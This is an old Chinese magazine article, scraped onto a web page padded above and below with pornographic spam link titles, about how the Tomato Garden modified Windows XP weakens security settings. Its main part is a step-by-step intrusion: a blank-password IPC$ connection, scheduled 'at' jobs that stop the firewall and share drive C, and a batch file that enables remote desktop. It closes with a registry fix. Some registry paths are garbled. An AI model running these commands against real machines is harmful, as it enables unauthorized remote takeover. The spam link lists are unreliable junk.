999精品在线视频,手机成人午夜在线视频,久久不卡国产精品无码,中日无码在线观看,成人av手机在线观看,日韩精品亚洲一区中文字幕,亚洲av无码人妻,四虎国产在线观看 ?

從番茄花園看經典IPC入侵

2007-12-31 00:00:00鄭志勇
電腦迷 2007年11期

記得微軟有個廣告,說的是非授權軟件就像毒蛇一樣侵蝕著電腦里的重要文件。大家往往對此不以為然,但事實上,選用一些非授權,非原版的軟件確實會帶來這種問題,連廣受歡迎的番茄花園也不能避免。

Windows系列的操作系統都提供共享服務,這些共享服務的主要通道就是IPC。IPC是Internet ProcessConnection的簡稱,也稱共享命名管道,它是為了讓進程間通信而開放的命名管道,可以通過驗證用戶名和密碼獲得相應的權限,在遠程管理計算機和查看計算機的共享資源時使用。這種入侵方式在Windows 2000普及的年代非常流行。

默認情況下Windows系列的操作系統都支持空連接,空連接是在沒有信任的情況下與服務器建立的會話,換句話說,它是一個到服務器的匿名訪問。利用ipc$,連接者可以與目標主機建立一個空的連接而無需用戶名與密碼(當然,對方機器必須開了ipc$共享,否則你是連接不上的),而XP系統限制了空連接導出用戶列表的功能,提高了安全性。

默認共享是系統安裝完畢后就自動開啟的共享,也叫管理共享,常被管理員用于遠程管理計算機。在Windows2000/XP及其以上版本中。默認開啟的共享有“c$”、“d$”、“admin$”、“ipc$”等,我們可以在“運行”對話框中輸入“\\\\計算機名\\盤符$”對這些資源進行訪問,以上這些共享就叫做默認共享。默認共享是只面向管理員組用戶開啟的共享,也就是說只有管理員組的用戶才能訪問這些共享,非管理員組用戶(即使是超級用戶)不能進行訪問。如果我們在對話框中輸入的不是管理員組用戶而是其他用戶組的賬戶和密碼(如guest組、backup operators組、power users組等),系統是不會讓我們訪問該共享資源的。另外密碼不能為空,否則也連不上XP的默認共享。

通常是無法利用IPC入侵原版XP的,最主要的原因是XP與2000在來訪者的權限設置上是不同的,在XP中即使有管理員權限的用戶和密碼也不一定能建立聯接或復制文件。

身份驗證:XP默認是把從網絡登錄的所有用戶都按來賓賬戶處理的,因此即使管理員從網絡登錄也只具有來賓的權限,在XP的(secpol.msc)本地安全設置/本地策略/安全選項中:

網絡訪問:本地帳戶的共享和安全模式,有兩個選項:

經典_本地用戶以自己的身份驗證

僅來賓_本地用戶以來賓身份驗證

當番茄花園系統安裝完成后,所有的盤符默認共享自動關閉,遠程桌面關閉,Remote Registry服務關閉,系統只開了IPC$通信命名管道,administrator密碼為空,如果安全選項和空口令設置和原版相同,則系統也將是安全的,然而問題出來了,點開始/運行輸入secpol.msc,展開本地安全設置/本地策略/安全選項中的“網絡訪問:本地帳戶的共享和安全模式”,可以發現被改為“經典”。

空口令限制:在XP的注冊表中有一項limitblank.passworduse,它是用來限制空口令連接的

[HKEY_LOcAL_MAcHINE\\SYSTEM\\ControlSet001\\Control\\LsaJ]

“limitblankpassworduse”=dword:00000001

很明顯看出來,通過導人注冊表來修改安全設置。

O:代表空密碼有效。1:代表空密碼無效。

系統默認是1,可以有效防止黑客人侵。

而在番茄花園系統中,點開始/運行輸入Regedit,展開[HKEY_LoCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Lsa]發現limitblankpassworduse被改為O。這就意味著,黑客利用了XP管理員的弱口令。

入侵番茄花園版XP,需要針對XP系統的特點,開啟和關閉一些服務(假設目標IP是192.168.1.5)。

1)net use\\\\192.168.1.5\\IPC$\" \"/user:\"admintitrators\"。

看到“命令成功完成”提示,連接成功1

2)net time\\\\192.168.1.5

查查時間,發現192.168.1.5的當前時間是2007/5/6下午5:12,出現“命令成功完成”提示。

3)at\\\\192.168.1.5 17:14 net stop“Window$Firewall/Internet connection Sharing(ICS)”

用at命令啟動net stop關閉對方計算機中的Windows Firewall/Intemet Connection sharing(ICS)服務以利于關閉Windows防火墻。

4)執行at\\\\192.168.1.5檢查任務是否安排。

5)再次執行net time\\\\192.168.1.5獲得遠程機器時間。

發現192.168.1.5的當前時間是2007/5/6下午5:29,出現“命令成功完成”提示。

6)執行at 17:30\\\\192.168.1.5 net share diskc=c:

開啟192.168.1.5的C盤共享。

7)打開我的電腦,輸入\\\\192.168.1.5\\diskc,新建一個文本文件,輸入以下內容

echo Windows Registry Editor Version 5.00>>3389.reg

echo[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlset\\Control\\Terminal server]>>3389.reg

echo\"fDenyTSConnections\"=dword:00000000>>3389.reg

echo[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\Wds\\rdpwd\\Tds\cP]>>3389.reg

echo\"PortNumber\"=dword:00000d3d>>3389.reg

echo[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcpl>>3389.reg

echo\"PortNumber\"=dword:00000d3d>>3389.reg

regedit/s 3389.reg

del 3389.reg

將文件保存為3389.bat。

8)再次執行net time\\\\192.168.1.5獲得遠程機器時間,發現192.168.1.5的當前時間是2007/5/6下午6:29,出現“命令成功完成”提示。

9)執行at 18:30\\\\192.168.1.5c:\\3389.bat。

10)點“開始/所有程序/附件/通訊”,運行“遠程桌面連接”,輸入192.168.1.5即可遠程操作計算機了。

知道漏洞產生的原因后,修補起來也是相當的簡單,關鍵是修改注冊表中的limitblankpassworduse和forceguest的鍵值,將下面的內容保存為fix.reg,雙擊fix.reg,提示是否導入注冊表,點確認后即可修補漏洞。

Windows Registrv Editor Version 5.00

[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa] \"forceguest\"=dword:00000001 \"limitblankpassworduse\"=dword:00000001

主站蜘蛛池模板: 欧洲亚洲欧美国产日本高清| 久久无码av三级| 丁香五月亚洲综合在线| 欧美精品高清| 国产一区在线视频观看| 亚洲视频免费播放| 久久精品无码专区免费| 中文字幕有乳无码| 免费国产小视频在线观看| 99人妻碰碰碰久久久久禁片| 国产精鲁鲁网在线视频| 六月婷婷激情综合| 亚洲无码视频一区二区三区| 一级片免费网站| 国产粉嫩粉嫩的18在线播放91| 园内精品自拍视频在线播放| 久久婷婷综合色一区二区| 国产精品视频观看裸模| 欧美第一页在线| 2018日日摸夜夜添狠狠躁| 国产成人超碰无码| 亚洲欧美日韩成人在线| a级毛片在线免费| 日韩中文精品亚洲第三区| 免费中文字幕在在线不卡 | 亚洲成肉网| 国产免费网址| 黑色丝袜高跟国产在线91| 国产精品jizz在线观看软件| 亚洲人视频在线观看| 亚洲水蜜桃久久综合网站| 免费在线看黄网址| 欧美激情视频二区| 国产精品永久不卡免费视频| 91精品国产麻豆国产自产在线 | 国产区成人精品视频| 亚洲无线国产观看| 久久久久免费精品国产| 亚洲一级毛片| 久久精品视频亚洲| 亚洲一级毛片| 好紧好深好大乳无码中文字幕| 国产综合精品一区二区| 日韩精品高清自在线| www.99精品视频在线播放| 91最新精品视频发布页| 欧美日韩亚洲国产主播第一区| 一级毛片在线播放免费| 亚洲无码高清免费视频亚洲| 精品人妻无码区在线视频| 99免费在线观看视频| 国产国拍精品视频免费看| 亚洲无限乱码| 亚洲综合激情另类专区| 热思思久久免费视频| 免费福利视频网站| 欧美国产日韩另类| 最新国产网站| 国产精品福利导航| 最新国产网站| 国产福利一区在线| 中文字幕天无码久久精品视频免费 | 91久久精品国产| 一本色道久久88| 国产91视频免费| 五月激情婷婷综合| 美女内射视频WWW网站午夜| 免费看a毛片| 热伊人99re久久精品最新地| 国产精品播放| 第一页亚洲| 一区二区无码在线视频| 国产乱人伦偷精品视频AAA| 日韩av资源在线| 一区二区三区在线不卡免费| 少妇人妻无码首页| 高清久久精品亚洲日韩Av| 999精品色在线观看| 99尹人香蕉国产免费天天拍| 国产精品福利导航| 激情乱人伦| 91成人在线免费视频|